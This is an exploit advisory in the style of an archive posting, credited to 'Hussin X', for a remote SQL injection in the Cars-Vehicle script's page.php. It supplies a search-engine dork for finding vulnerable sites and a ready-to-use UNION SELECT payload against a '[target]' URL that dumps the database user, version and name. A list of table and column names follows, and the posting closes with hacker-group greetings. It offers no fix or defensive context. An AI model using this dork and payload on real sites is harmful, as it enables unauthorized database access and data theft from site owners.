The Cars-Vehicle script suffers from a remote SQL injection vulnerability in page.php.
2c699d193b0cdff026f7fa43eee8909c719814e1f186caf7d069ce04e26d9dfe
|___________________________________________________|
|
| Cars-Vehicle Script (lnkid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : https://rfaah.com/index.php?lngge=English.php
|
| DorK : inurl:page.php?lnkid=
|___________________________________________________|
Exploit:
________
www.[target].com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/*
________________________
table_name : column_name
constants:logfile
constants:tflid
constants:tflpth
constants:tpctrpth
constants:tthmbpth
constants:lpctrid
constants:lpctrpth
onstants:apctrid
constants:apctrpth
constants:npctrid
constants:npctrpth
constants:nthmbpth
constants:fpctrid
constants:fpctrpth
constants:ipctrid
constants:ipctrpth
constants:spctrid
constants:spctrpth
constants:sthmbpth
constants:upctrid
constants:upctrpth
constants:dflid
constants:gpctrid
_______________________
____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
Im IRAQi